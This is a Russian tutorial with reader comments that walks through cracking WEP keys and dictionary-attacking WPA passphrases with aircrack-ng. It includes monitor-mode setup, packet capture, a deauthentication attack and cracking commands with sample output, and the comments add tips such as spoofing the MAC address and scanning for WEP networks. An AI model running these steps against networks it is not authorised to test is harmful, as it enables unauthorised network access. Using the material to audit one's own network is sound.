Инструкция по подбору ключей шифрования в беспроводных сетях, базирующихся на механизме WEP, являющемся устаревшим, но продолжающем широко использоваться.Устанавливаем пакет [[http://aircrack-ng.org AIR Crack]].
В Debian/Ubuntu:$ sudo apt-get install aircrack-ng
В Fedora/CentOS/RHEL:
$ sudo yum -y install aircrack-ng
Определяем сетевой интерфейс, привязанный к беспроводной карте:
2. Identify wireless network interface$ /sbin/iwconfig
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
Активируем режим мониторинга:
$ sudo airmon-ng start wlan0
Interface Chipset Driver
wlan0 rtl8180 - [phy0]
(monitor mode enabled on mon0)Определяем BSSID-идентификатор сети:
$ sudo airodump-ng wlan0
BASE:
BSSID : 00:0F:B5:FD:FB:C2
Channel: 6
STATION:
MAC: 00:13:04:30:FA:ECДля успешного проведения атаки к точке доступа должна быть подключена хотя бы одна активная машина, чем больше трафик у которой, тем быстрее будет подобран ключ.
Включаем режим снифинга и накапливаем статистику. Чем длиннее WEP-ключ тем больше пакетов необходимо перехватить (64-битный ключ требует накопления примерно 6000 пакетов):
$ sudo airodump-ng -c 6 --bssid 00:0F:B5:FD:FB:C2 -w data-capture wlan0
где, "-c 6" - номер канала беспроводной точки доступа (см. вывод airodump-ng wlan0). В опции --bssid указан идентификатор точки доступа, для отсеивания лишнего трафика. Все перехваченные пакеты будут сохранены в файле data-capture-01.cap.
После накопления достаточного объема статистики подбираем WEP-ключ (выполняем операцию не прерывая процесс снифинга, так как числа перехваченных пакетов может не хватить):
$ sudo aircrack-ng -z data-capture-01.cap
Opening data-capture-01.cap
Read 450 packets.# BSSID ESSID Encryption
1 00:11:95:35:FD:12 test1 WEP (210 IVs)
2 00:17:3F:62:2E:50 test2 None (0.0.0.0)Index number of target network ? 1
[00:00:21] Tested 485 keys (got 17690 IVs)
KB depth byte(vote)
0 9/ 13 00(20993) 06(20737) 27(20736) 3F(20736) A2(20736)
1 0/ 1 F3(28417) A8(23298) 34(21248) 57(21248) A3(21248)
2 0/ 2 8E(25857) BC(23809) 3F(23040) D2(22784) 69(21504)
3 0/ 5 6E(24321) 35(2259) 5A(22016) 95(22016) B8(22016)
4 3/ 4 98(21505) 7C(20993) 84(20992) E0(20992) F0(20992)KEY FOUND! [ 1F:F3:6E:6A:98 ]
Decrypted correctly: 100%На выходе получили искомый ключ "1F:F3:6E:6A:98".
++ Подбор простого словарного pre-shared WPA-ключа.Похожим образом осуществляется подбор WPA-ключа, только для успешного завершения подбора требуется значительно больше времени и определенное везение.
После запуска airodump-ng дожидаемся соединения клиента к сети:
CH 6 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
...
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116После чего инициируем деаутентификацию клиента:
$ sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
где, 1 - число отправленных deauth-пакетов, 00:14:6C:7E:40:80 - MAC точки доступа, 00:0F:B5:FD:FB:C2 - MAC клиента.
Запускаем процесс подбора ключевой фразы по словарю password.lst.
$ aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 data-capture-01.cap
В случае успеха получаем примерно следующее:
BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
...
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 ...
Transcient Key : 06 F8 ...
EAPOL HMAC : 4E 27 ...
URL: http://www.linuxconfig.org/how-to-crack-a-wireless-wep-key-u... http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Обсуждается: http://www.opennet.me/tips/info/2424.shtml
ребята я конечно всё понимаю -- но подобные мануалы, в который в самом начале не сказано что "данная информация предназначена _только_ для ознакомления и может быть использованна _исключительно_ в целях проверки собственной сетевой инфраструктуры" могут быть истолкованы в рамках вполне конкретной статьи УК РФ. !!!WARNING!!!
Может кто подскажет как попроще сделать загрузочную флешку с подобными инструментами на борту?
http://www.aircrack-ng.org/doku.php?id=slitaz
Мануалы по взлому вай-файя плодятся уже 10 лет подряд. Вековой баян. Называется, "для тех, кто без гугла" или "самым одаренным от самых одаренных ".
А методы защиты слабо написать?
использовать WPA2
не панацея.
нужны radius, kerberos.
угу, и сисадмина застрелить сразу...
нафига??? EAP-TLS с привязкой к мак адресу.
и нач. отдела кадров на выдачу ключей :-D
их стреляй скокавлезет
WPA2
PSK = "4My$uPpErP@$$\/\/0rD|"
Странно видеть подобную статью на опеннете. Про этот метод только очень ленивые не писали.
Прочитал заголовок, думал, что что-то новое. А оказалось всё старое. N900 WEP как орешки раскалывает.
я конечно дико извиняюсь, но ИМХО статьи на opennet - не хватало, по причине того что на opennet - очень приятно читать и скать любую информацию, да не смотря на то что есть google - opennet - это не только статья как таковая а еще и полезные комментарии.
Поддерживаю! порой комментарии бывают содержательней, чем сама статья!
ИМХО, немешает добавить пункт со сменой МАК-адреса атакующей карточки перед началом атаки ;)
Cкажите, в статье есть строки:"Определяем BSSID-идентификатор сети:
$ sudo airodump-ng wlan0"Как автор узнал, что в сети "00:0F:B5:FD:FB:C2", которую он нашел, используется WEP?
Вопрос: как быстро найти WEP-сети без использования kismet каким-нибудь скриптом?
Дело в том, что на N900 дико неудобно юзать Kismet из консоли.
я использую простой скриптiwlist wlan0 scanning | grep -e ESSID -e Encryption -e WPA -e Channel -e Address | grep -v Frequency | sed 's/Address:/net/' | sed 's/Cell [0-9]* -//' | sed 's/^.*Channel://' | sed 's/^.*Encryption key:/enc-/' | sed 's/^.*ESSID://' | sed 's/^.*IE: //' | tr '\n' '|' | sed 's/ /\t/g' | tr '\t' '\n' | grep -v WPA
который выдает все открытые сетки вокруг + WEP сетки. Для меня очень удобно - не всегда есть возможность графику включить - например на wrt54 )))
ну или простоwlist wlan0 scan
и ручками просмотреть где стоит "Encryption on" но после этого ничего про WPA или WPA2 не сказано - значит WEP
>ну или просто
>
>wlist wlan0 scan
>
>и ручками просмотреть где стоит "Encryption on" но после этого ничего про
>WPA или WPA2 не сказано - значит WEPСпасибо! Не знал про wlist.
Надо бы написать для Maemo скриптец для взлома сети одним кликом. )
капец, ломатели, неужели кто-то еще юзает WPA и WEP.
Либо просто открытая сетка, либо WPA2 и все эти древние мануалы идут лесом.
Используют. Некоторые мобильные устройства WPA2 не понимают, только WPA.
да запросто: dir-300 по дефолту стоит WPA/WEP или вообще без шифрования. и так почти везде
Да и брутфорс по словарю актуален действительно только при пароле вроде "12345678"... Но кто такой установит :)
В статье не сказано, что нужно ловить "#Data" пакеты, а не простые. Во вторых, не сказано как нагонять эти пакеты (рукопожатие и т. д.) обеими способами.Я долго не мог понять почему у меня aircrack-ng пишет "Got no data packets from target network!". Эта статья сбила меня. :)
В общем, ловить data-пакеты WEP можно очень долго и нудно. Я вот за час не поймал ни одного пакета, хотя вокруг меня 4 WEP-точки.
Может дело в N900... не знаю.
я установил =)
странно, но aurodump-ng выдаёт сверху следующее: [fixed channel mode -1] как то так. что бы это могла значить?
новичок